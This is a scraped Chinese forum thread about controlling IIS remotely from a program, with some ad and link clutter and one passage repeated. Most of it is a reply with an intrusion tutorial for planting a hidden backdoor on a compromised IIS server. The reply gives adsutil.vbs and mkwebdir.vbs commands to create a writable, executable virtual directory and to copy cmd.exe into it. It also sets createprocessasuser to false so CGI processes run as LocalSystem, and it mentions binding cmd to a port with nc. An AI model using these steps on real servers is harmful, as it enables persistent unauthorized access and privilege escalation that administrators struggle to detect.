高分求教(分不够还可以继续补):我想通过程序远程控制IIS,如何实现?主要是如何先通过程序登陆到远程机器上? 如题 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 不用这样麻烦,只要ADsGetObject(L"IIS://&computername&/w3svc",IID_IADsContainer,(void**)&iContainerServer),computername是其他机器名,能执行成功就行了。我查资料好像是winlogon相关的东西,但是我一点也不熟悉,不知从哪里下手。 IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。 当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。 入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。 1. telnet到服务器 2. cscript.exe adsutil.vbs enum w3svc/1/root KeyType : (STRING) "IIsWebVirtualDir" AppRoot : (STRING) "/LM/W3SVC/1/ROOT" AppFriendlyName : (STRING) "默认应用程序" AppIsolated : (INTEGER) 2 AccessRead : (BOOLEAN) True AccessWrite : (BOOLEAN) False AccessExecute : (BOOLEAN) False AccessScript : (BOOLEAN) True AccessSource : (BOOLEAN) False AccessNoRemoteRead : (BOOLEAN) False AccessNoRemoteWrite : (BOOLEAN) False AccessNoRemoteExecute : (BOOLEAN) False AccessNoRemoteScript : (BOOLEAN) False HttpErrors : (LIST) (32 Items) "400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm" "401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm" "401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm" "401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm" "401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm" "401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm" "403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm" "403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm" "403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm" "403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm" "403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm" "403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm" "403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm" "403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm" "403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm" "403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm" "403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm" "403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm" "403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm" "403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm" "403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm" "403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm" "404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm" "405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm" "406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm" "407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm" "412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm" "414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm" "500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm" "500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm" "500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm" "500,100,URL,/iisHelp/common/500-100.asp" FrontPageWeb : (BOOLEAN) True Path : (STRING) "c:\inetpub\wwwroot" AccessFlags : (INTEGER) 513 [/w3svc/1/root/localstart.asp] [/w3svc/1/root/_vti_pvt] [/w3svc/1/root/_vti_log] [/w3svc/1/root/_private] [/w3svc/1/root/_vti_txt] [/w3svc/1/root/_vti_script] [/w3svc/1/root/_vti_cnf] [/w3svc/1/root/_vti_bin] 不要告诉我你不知道上面的输出是什么!!!! 现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了 3. mkdir c:\inetpub\wwwroot\dir1 4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1" 这样就建好了一个虚目录:Virtual Dir1 你可以用 1 的命令看一下 5. 接下来要改变一下Virtual Dir1的属性为execute cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s: cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。 6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false 注释:cscript windows script host. adsutil.vbs windows iis administration script 后面是 iis metabase path 这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧) 楼上这位老兄,别搞错,我不是蓄谋入侵服务器,我的程序就是想远程管理iis,upload就没意义了 你可以试试ADsOpenObject这个函数,不过不一定好用 xfilter代码问题 这些运算符什么意思呀 请教COM组件错误异常处理问题 发现vs2003的资源管理器有超多的BUG 关于存数到Xml文档中的问题(put_text中的数据) explor中文件的图标 哪位有Microsoft VisualStudio.NET 7.0的序列號? 各位大师,一个好的程序设计师平均一个月能够生产多少合格代码行 高分征求 udp 过sock5代理的 客户端程序! 我会再补加分 征求二分法实例 初次接触COM了解不多询问:基于Dialog的程序动态生成浏览器组件并响应事件的问题 有关于文档类和视图类的问题
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。 入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。 1. telnet到服务器 2. cscript.exe adsutil.vbs enum w3svc/1/root KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp" FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin] 不要告诉我你不知道上面的输出是什么!!!! 现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了 3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1" 这样就建好了一个虚目录:Virtual Dir1 你可以用 1 的命令看一下 5. 接下来要改变一下Virtual Dir1的属性为execute cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。 6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false 注释:cscript windows script host. adsutil.vbs windows iis administration script 后面是 iis metabase path 这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
楼上这位老兄,别搞错,我不是蓄谋入侵服务器,我的程序就是想远程管理iis,upload就没意义了
你可以试试ADsOpenObject这个函数,不过不一定好用